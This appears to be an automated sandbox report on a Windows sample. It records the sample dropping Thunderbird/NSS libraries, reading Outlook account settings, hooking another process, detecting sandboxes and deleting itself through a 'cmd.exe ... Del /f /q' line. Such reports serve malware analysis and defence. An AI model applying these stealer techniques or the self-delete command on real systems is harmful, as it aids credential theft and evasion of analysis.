Source: eLZzxG56uH.exe, 00000000.00000002.317091728.000000006EBC0000.00000002.00020000.sdmp, sqlite3.dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: eLZzxG56uH.exe, 00000000.00000002.317091728.000000006EBC0000.00000002.00020000.sdmp, nss3.dll.0.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);
Source: eLZzxG56uH.exe, 00000000.00000002.317091728.000000006EBC0000.00000002.00020000.sdmp, nss3.dll.0.dr	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: eLZzxG56uH.exe, 00000000.00000002.317091728.000000006EBC0000.00000002.00020000.sdmp, nss3.dll.0.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
Source: sqlite3.dll.0.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Mutant created: \Sessions\1\BaseNamedObjects\user5L1M3_noturbusiness
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3460:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2884:120:WilError_01

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

Command line argument: nq"

0_2_002270C0

Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager

Jump to behavior

Source: eLZzxG56uH.exe

Static file information: File size 4704768 > 1048576

Source: eLZzxG56uH.exe

Static PE information: Raw size of Intel Co is bigger than: 0x100000 < 0x43a000

Source: eLZzxG56uH.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.0.dr
Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: eLZzxG56uH.exe, 00000000.00000002.317091728.000000006EBC0000.00000002.00020000.sdmp, nss3.dll.0.dr
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.0.dr
Source:	Binary string: ucrtbase.pdb source: ucrtbase.dll.0.dr
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: api-ms-win-core-memory-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.0.dr
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.0.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: eLZzxG56uH.exe, 00000000.00000002.316625537.000000006EAB9000.00000002.00020000.sdmp, mozglue.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.0.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.0.dr
Source:	Binary string: msvcp140.i386.pdb source: msvcp140.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy.dll.0.dr
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.0.dr
Source:	Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.0.dr
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.0.dr
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.0.dr
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: eLZzxG56uH.exe, 00000000.00000002.316625537.000000006EAB9000.00000002.00020000.sdmp, mozglue.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.0.dr
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr
Source:	Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source:	Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.0.dr
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.0.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.0.dr
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.0.dr
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.0.dr
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.0.dr

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

Code function: 0_2_00800100 push ebp; ret

0_2_00800117

Source: eLZzxG56uH.exe	Static PE information: section name: Intel Co
Source: eLZzxG56uH.exe	Static PE information: section name: Intel Co
Source: eLZzxG56uH.exe	Static PE information: section name: Intel Co
Source: sqlite3.dll.0.dr	Static PE information: section name: /4
Source: sqlite3.dll.0.dr	Static PE information: section name: /19
Source: sqlite3.dll.0.dr	Static PE information: section name: /31
Source: sqlite3.dll.0.dr	Static PE information: section name: /45
Source: sqlite3.dll.0.dr	Static PE information: section name: /57
Source: sqlite3.dll.0.dr	Static PE information: section name: /70
Source: sqlite3.dll.0.dr	Static PE information: section name: /81
Source: sqlite3.dll.0.dr	Static PE information: section name: /92
Source: AccessibleHandler.dll.0.dr	Static PE information: section name: .orpc
Source: AccessibleMarshal.dll.0.dr	Static PE information: section name: .orpc
Source: IA2Marshal.dll.0.dr	Static PE information: section name: .orpc
Source: lgpllibs.dll.0.dr	Static PE information: section name: .rodata
Source: MapiProxy.dll.0.dr	Static PE information: section name: .orpc
Source: MapiProxy_InUse.dll.0.dr	Static PE information: section name: .orpc
Source: mozglue.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

Code function: 0_2_001F49A2 LoadLibraryA,GetProcAddress,FreeLibrary,

0_2_001F49A2

Source: initial sample

Static PE information: section where entry point is pointing to: Intel Co

Source: ucrtbase.dll.0.dr

Static PE information: 0x9E3394C7 [Sun Feb 8 16:22:31 2054 UTC]

Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleMarshal.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssdbm3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy_InUse.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32_InUse.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\qipcap.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\lgpllibs.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\prldap60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\breakpadinjector.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\IA2Marshal.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ucrtbase.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\libEGL.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssckbi.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldap60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldif60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleHandler.dll	Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Show sources

Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Memory written: PID: 3340 base: 1530005 value: E9 FB BF 0E 76	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Memory written: PID: 3340 base: 7761C000 value: E9 0A 40 F1 89	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Memory written: PID: 3340 base: 1540008 value: E9 AB E0 11 76	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Memory written: PID: 3340 base: 7765E0B0 value: E9 60 1F EE 89	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Memory written: PID: 3340 base: 1670005 value: E9 CB 5A 29 75	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Memory written: PID: 3340 base: 76905AD0 value: E9 3A A5 D6 8A	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Memory written: PID: 3340 base: 3220005 value: E9 5B B0 70 73	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Memory written: PID: 3340 base: 7692B060 value: E9 AA 4F 8F 8C	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Memory written: PID: 3340 base: 3230005 value: E9 DB F8 31 71	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Memory written: PID: 3340 base: 7454F8E0 value: E9 2A 07 CE 8E	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Memory written: PID: 3340 base: 3240005 value: E9 FB 42 33 71	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Memory written: PID: 3340 base: 74574300 value: E9 0A BD CC 8E	Jump to behavior

Self deletion via cmd delete

Show sources

Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Process created: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\eLZzxG56uH.exe'
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Process created: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\eLZzxG56uH.exe'			Jump to behavior

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

Code function: 0_2_001E06DD __EH_prolog,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_001E06DD

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: eLZzxG56uH.exe, 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: eLZzxG56uH.exe, 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp	Binary or memory string: SBIEDLL.DLL6

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\eLZzxG56uH.exe	RDTSC instruction interceptor: First address: 000000000067BEBE second address: 000000000067BEC7 instructions: 0x00000000 rdtsc 0x00000002 cwde 0x00000003 inc cl 0x00000005 ror cl, 1 0x00000007 mov al, dl 0x00000009 rdtsc
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	RDTSC instruction interceptor: First address: 000000000049A2ED second address: 000000000049A2F6 instructions: 0x00000000 rdtsc 0x00000002 cwde 0x00000003 inc cl 0x00000005 ror cl, 1 0x00000007 mov al, dl 0x00000009 rdtsc

Source: C:\Users\user\Desktop\eLZzxG56uH.exe TID: 4840	Thread sleep time: -150000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 5348	Thread sleep count: 72 > 30			Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleMarshal.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssdbm3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
